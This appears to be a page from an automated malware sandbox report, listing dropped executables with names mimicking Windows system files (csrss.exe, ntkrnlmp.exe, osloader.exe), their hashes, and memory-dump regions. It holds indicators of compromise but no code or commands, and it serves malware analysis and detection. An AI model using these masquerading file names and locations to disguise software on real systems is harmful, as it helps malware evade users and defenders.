414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

SHA512
aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
MD5
941b755a404a616a55ea57ff4dbfe184

SHA1
946096ca05b666f9ef7c8bfb86a34a9435c24ab7

SHA256
9afabdf762ea2e412019ce0f6004f7fe1c948f2b36e1aab347e623fedd5ef440

SHA512
6a8afe8b6cfdeb86918b0eac83df316d43bc47bb8ba3a55c5ecb1fcc9aab36031f744b75f2afe53ff329b0a30aa3708332efda1592369c86fd12ae013335067a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
MD5
941b755a404a616a55ea57ff4dbfe184

SHA1
946096ca05b666f9ef7c8bfb86a34a9435c24ab7

SHA256
9afabdf762ea2e412019ce0f6004f7fe1c948f2b36e1aab347e623fedd5ef440

SHA512
6a8afe8b6cfdeb86918b0eac83df316d43bc47bb8ba3a55c5ecb1fcc9aab36031f744b75f2afe53ff329b0a30aa3708332efda1592369c86fd12ae013335067a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\m672.exe
MD5
1496f269a788b609062adbd300f2d18c

SHA1
93cca5098d5a87f673624dcc5ab7d9de4f4bbdf7

SHA256
9d41d85b30958480be3f7eeff32d2cf4ebe2f1c5790dedfd8cbac0a3c8b58f03

SHA512
527722a7fb5d68f441fab4550273166633e8a555eb04c060fba50bda7f9e72060a0fbe9e495905f26b72bd58a03a25ab6797e87ff187c1c37c14f41922ca0914

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
MD5
0a13d106fa3997a0c911edd5aa0e147a

SHA1
36fae45bbb17d7c3fc2cc4807057636558a416e3

SHA256
5e46ecffcff9440e97bf4f0a85ad34132407f925b27a8759f5a01de5ea4da6af

SHA512
ae2a2c7bc9dfda5d6012a8bab80c7be92762bb63c6e73de4f6b21768faab2637d51c147defe454bf8504cc2845a1914bbbeb1519e0be3343380b011da3467da4

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
MD5
0a13d106fa3997a0c911edd5aa0e147a

SHA1
36fae45bbb17d7c3fc2cc4807057636558a416e3

SHA256
5e46ecffcff9440e97bf4f0a85ad34132407f925b27a8759f5a01de5ea4da6af

SHA512
ae2a2c7bc9dfda5d6012a8bab80c7be92762bb63c6e73de4f6b21768faab2637d51c147defe454bf8504cc2845a1914bbbeb1519e0be3343380b011da3467da4

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
MD5
d54ade674cb0c3e6d322ed7380e8adf6

SHA1
d10dd83f261a9e4fed3f86b6d4e798b7f3b14b73

SHA256
5191548b8edf4b98e623f055f5205e2db17aa220c28928b1da1c3a9ba1a75ee0

SHA512
5e0dba44f7dea3929b172b48e7c9492d06c59599cbc433f8be9e53c81935f1b5fe2dfb2404b41b7d9a7db39dedf1115ea23d454d2306f314af17f7ddeedc5065

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
MD5
d54ade674cb0c3e6d322ed7380e8adf6

SHA1
d10dd83f261a9e4fed3f86b6d4e798b7f3b14b73

SHA256
5191548b8edf4b98e623f055f5205e2db17aa220c28928b1da1c3a9ba1a75ee0

SHA512
5e0dba44f7dea3929b172b48e7c9492d06c59599cbc433f8be9e53c81935f1b5fe2dfb2404b41b7d9a7db39dedf1115ea23d454d2306f314af17f7ddeedc5065

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
MD5
c6e81bac5a3385a0a9cef0bf9b45c624

SHA1
f52f673d68a66f212c25687aae6c054d89c9b47a

SHA256
3414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c

SHA512
328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
MD5
c6e81bac5a3385a0a9cef0bf9b45c624

SHA1
f52f673d68a66f212c25687aae6c054d89c9b47a

SHA256
3414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c

SHA512
328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
MD5
9c84377ef100ddb897aab7f8a923c01e

SHA1
9750679980141b268eb5c0d9e593d312e0069098

SHA256
c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

SHA512
1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
MD5
9c84377ef100ddb897aab7f8a923c01e

SHA1
9750679980141b268eb5c0d9e593d312e0069098

SHA256
c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

SHA512
1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
MD5
9c84377ef100ddb897aab7f8a923c01e

SHA1
9750679980141b268eb5c0d9e593d312e0069098

SHA256
c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

SHA512
1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
MD5
9c84377ef100ddb897aab7f8a923c01e

SHA1
9750679980141b268eb5c0d9e593d312e0069098

SHA256
c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

SHA512
1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
MD5
9c84377ef100ddb897aab7f8a923c01e

SHA1
9750679980141b268eb5c0d9e593d312e0069098

SHA256
c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

SHA512
1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
MD5
9c84377ef100ddb897aab7f8a923c01e

SHA1
9750679980141b268eb5c0d9e593d312e0069098

SHA256
c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

SHA512
1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
MD5
9c84377ef100ddb897aab7f8a923c01e

SHA1
9750679980141b268eb5c0d9e593d312e0069098

SHA256
c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

SHA512
1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
MD5
9a4b7b0849a274f6f7ac13c7577daad8

SHA1
51219052fd31598113d1f30d938a560dd1434163

SHA256
c1d5a585fce188423d31df3ea806272f3daa5eb989e18e9ecf3d94b97b965f8e

SHA512
cd12f75e9198c88a3e1425c0c39956a50b10369074a3f35aba67868d3c02b5877bc6762292b35fbca37e80af4db6c02403ab3a9d1afc66ff38ce2f0d15fdcfce

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
MD5
9a4b7b0849a274f6f7ac13c7577daad8

SHA1
51219052fd31598113d1f30d938a560dd1434163

SHA256
c1d5a585fce188423d31df3ea806272f3daa5eb989e18e9ecf3d94b97b965f8e

SHA512
cd12f75e9198c88a3e1425c0c39956a50b10369074a3f35aba67868d3c02b5877bc6762292b35fbca37e80af4db6c02403ab3a9d1afc66ff38ce2f0d15fdcfce

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll
MD5
f0616fa8bc54ece07e3107057f74e4db

SHA1
b33995c4f9a004b7d806c4bb36040ee844781fca

SHA256
6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

SHA512
15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
MD5
1afff8d5352aecef2ecd47ffa02d7f7d

SHA1
8b115b84efdb3a1b87f750d35822b2609e665bef

SHA256
c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

SHA512
e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
MD5
1afff8d5352aecef2ecd47ffa02d7f7d

SHA1
8b115b84efdb3a1b87f750d35822b2609e665bef

SHA256
c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

SHA512
e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
MD5
1afff8d5352aecef2ecd47ffa02d7f7d

SHA1
8b115b84efdb3a1b87f750d35822b2609e665bef

SHA256
c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

SHA512
e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll
MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe
MD5
160dd398272fd4fdf51f410adad9a51b

SHA1
f49489e7960978dd7dbb1784b0c67b1fd540926d

SHA256
2bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e

SHA512
8e9d8eadc207bc4ee11d7971a7dc75f1cacd94579c03f406128c302e85c50c0f58e5723d3da74f0c0049b18cdde1842ef6658dbee5d897154377fb39fae4ead4

Download Submit
\Windows\rss\csrss.exe
MD5
160dd398272fd4fdf51f410adad9a51b

SHA1
f49489e7960978dd7dbb1784b0c67b1fd540926d

SHA256
2bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e

SHA512
8e9d8eadc207bc4ee11d7971a7dc75f1cacd94579c03f406128c302e85c50c0f58e5723d3da74f0c0049b18cdde1842ef6658dbee5d897154377fb39fae4ead4

Download Submit
memory/328-48-0x0000000000000000-mapping.dmp

Download
memory/528-59-0x0000000000000000-mapping.dmp

Download
memory/604-49-0x0000000000000000-mapping.dmp

Download
memory/628-62-0x0000000000400000-0x0000000000897000-memory.dmp

Filesize
4.6MB

Download
memory/680-47-0x0000000000000000-mapping.dmp

Download
memory/692-12-0x0000000004FB0000-0x0000000004FC1000-memory.dmp

Filesize
68KB

Download
memory/796-95-0x0000000000400000-0x0000000000C1B000-memory.dmp

Filesize
8.1MB

Download
memory/796-57-0x0000000000000000-mapping.dmp

Download
memory/796-46-0x0000000000000000-mapping.dmp

Download
memory/816-44-0x0000000000000000-mapping.dmp

Download
memory/828-53-0x0000000000000000-mapping.dmp

Download
memory/904-72-0x0000000000400000-0x0000000000AB6000-memory.dmp

Filesize
6.7MB

Download
memory/904-70-0x0000000000000000-mapping.dmp

Download
memory/908-123-0x0000000000000000-mapping.dmp

Download
memory/952-10-0x0000000000000000-mapping.dmp

Download
memory/1056-54-0x0000000000000000-mapping.dmp

Download
memory/1140-56-0x0000000000000000-mapping.dmp

Download
memory/1164-3-0x0000000000000000-mapping.dmp

Download
memory/1212-50-0x0000000000000000-mapping.dmp

Download
memory/1248-45-0x0000000000000000-mapping.dmp

Download
memory/1260-39-0x000007FEF6F80000-0x000007FEF71FA000-memory.dmp

Filesize
2.5MB

Download
memory/1344-52-0x0000000000000000-mapping.dmp

Download
memory/1488-92-0x0000000000400000-0x0000000000C1C000-memory.dmp

Filesize
8.1MB

Download
memory/1492-51-0x0000000000000000-mapping.dmp

Download
memory/1500-55-0x0000000000000000-mapping.dmp

Download
memory/1568-16-0x0000000000000000-mapping.dmp

Download
memory/1584-24-0x0000000000400000-0x0000000000C77000-memory.dmp

Filesize
8.5MB

Download
memory/1584-23-0x0000000003480000-0x0000000003491000-memory.dmp

Filesize
68KB

Download
memory/1584-21-0x0000000000000000-mapping.dmp

Download
memory/1588-99-0x0000000000400000-0x00000000005E6000-memory.dmp

Filesize
1.9MB

Download
memory/1588-97-0x0000000000000000-mapping.dmp

Download
memory/1608-64-0x0000000000000000-mapping.dmp

Download
memory/1648-5-0x0000000004E80000-0x0000000004E91000-memory.dmp

Filesize
68KB

Download
memory/1648-6-0x0000000000400000-0x0000000000C77000-memory.dmp

Filesize
8.5MB

Download
memory/1648-7-0x0000000004E80000-0x00000000056DD000-memory.dmp

Filesize
8.4MB

Download
memory/1648-8-0x0000000000400000-0x0000000000C77000-memory.dmp

Filesize
8.5MB

Download
memory/1648-2-0x0000000074D11000-0x0000000074D13000-memory.dmp

Filesize
8KB

Download
memory/1724-65-0x0000000000000000-mapping.dmp

Download
memory/1900-86-0x0000000000400000-0x0000000000C1B000-memory.dmp

Filesize
8.1MB

Download
memory/1900-80-0x0000000000000000-mapping.dmp

Download
memory/2020-74-0x0000000000000000-mapping.dmp

Download
memory/2020-85-0x0000000000400000-0x0000000000C1C000-memory.dmp

Filesize
8.1MB

Download
memory/2024-17-0x0000000000000000-mapping.dmp

Download
memory/2024-18-0x000007FEFB631000-0x000007FEFB633000-memory.dmp

Filesize
8KB

Download
memory/2120-111-0x0000000000400000-0x00000000007FD000-memory.dmp

Filesize
4.0MB

Download
memory/2120-109-0x0000000000000000-mapping.dmp

Download
memory/2192-112-0x0000000000000000-mapping.dmp

Download
memory/2192-124-0x00000000033F0000-0x00000000033F1000-memory.dmp

Filesize
4KB

Download
memory/2220-115-0x0000000000000000-mapping.dmp

Download
memory/2220-119-0x0000000000400000-0x00000000007FB000-memory.dmp

Filesize
4.0MB

Download
memory/2260-117-0x0000000000000000-mapping.dmp

Download
memory/2328-121-0x0000000000000000-mapping.dmp

Download